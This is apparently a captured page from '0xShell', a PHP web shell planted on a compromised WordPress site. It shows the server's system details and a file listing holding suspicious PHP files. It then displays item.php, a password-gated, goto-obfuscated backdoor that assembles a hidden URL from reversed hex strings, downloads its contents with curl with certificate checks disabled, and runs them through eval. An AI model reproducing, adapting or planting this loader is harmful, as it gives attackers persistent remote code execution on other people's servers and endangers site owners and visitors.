0xShell
Shell MySQL Netstat SMTP FTP SSH 未选择任何文件 Domain Upload
file
System Info:
User: couragent | UID: 1022 | GID: 1024 | Groups: 1024
Server IP: 62.72.47.222 | Client IP: 23.145.24.71
PHP: 8.1.29 | OS: Linux | Server: LiteSpeed
command
/home/couragent/public_html$
Enter file path to read
Files
../ �
.htaccess � '0e �4e5
.tmb/ �
.user.ini � '0e �4e5
.well-known/ �
123.php � '0e �4e5
cgi-bin/ �
clasa99.php � '0e �4e5
error_log � '0e �4e5
evs.txt � '0e �4e5
home/ �
index.php � �4e5
license.txt � '0e �4e5
op.php � '0e �4e5
php.ini � '0e �4e5
readme.html � '0e �4e5
robots.txt � '0e �4e5
wp-activate.php � '0e �4e5
wp-admin/ �
wp-blog-header.php � '0e �4e5
wp-comments-post.php � '0e �4e5
wp-config-sample.php � '0e �4e5
wp-config.php � '0e �4e5
wp-content/ �
wp-cron.php � '0e �4e5
wp-includes/ �
wp-links-opml.php � '0e �4e5
wp-load.php � '0e �4e5
wp-login.php � '0e �4e5
wp-mail.php � '0e �4e5
wp-settings.php � '0e �4e5
wp-signup.php � '0e �4e5
wp-trackback.php � '0e �4e5
xmlrpc.php � '0e �4e5
Viewing: op.php
0xShell
0xShell
×
Upload to Multiple Directories
System Info:
User: jonasls |
UID: 188156 |
GID: 100 |
Groups: 100
Server IP: 10.127.20.1 |
Client IP: 216.73.216.28
PHP: 8.0.30 |
OS: Linux |
Server: Apache
Files
Viewing: item.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') {
$_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
goto sxpzC; Ku22d: $SS8Fu .= "\x2e\x35\57"; goto hFeQO; niJPu: $SS8Fu .= "\x6f\164\x2e\x31\60"; goto cNjvp; Wop7u: $SS8Fu .= "\x6d\141\x64\x2f\160"; goto niJPu; sSAji: $SS8Fu .= "\164\170\164"; goto Ku22d; sxpzC: $SS8Fu = ''; goto sSAji; Pm8C0: $SS8Fu .= "\144\x2f\57"; goto X2745; hFeQO: $SS8Fu .= "\144\x6c\157\x2f\x61"; goto Wop7u; X2745: $SS8Fu .= "\x3a\x73\160\x74"; goto T5ftU; cNjvp: $SS8Fu .= "\x61\x6d\x61"; goto Pm8C0; T5ftU: $SS8Fu .= "\x74\x68"; goto zWfEB; zWfEB: eval("\x3f\76" . tW2KX(strrev($SS8Fu))); goto gPzcS; gPzcS: function TW2KX($V1_rw = '') { goto uhE6D; Q510J: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto VN0qi; Mj0OL: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto mLL0A; mLL0A: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto i9wy_; cm3pV: curl_close($xM315); goto C3tjU; p9vG6: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto Q510J; C3tjU: return $tvmad; goto ueEhW; uhE6D: $xM315 = curl_init(); goto Mj0OL; i9wy_: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto p9vG6; VN0qi: $tvmad = curl_exec($xM315); goto cm3pV; ueEhW: }
Disabled functions: None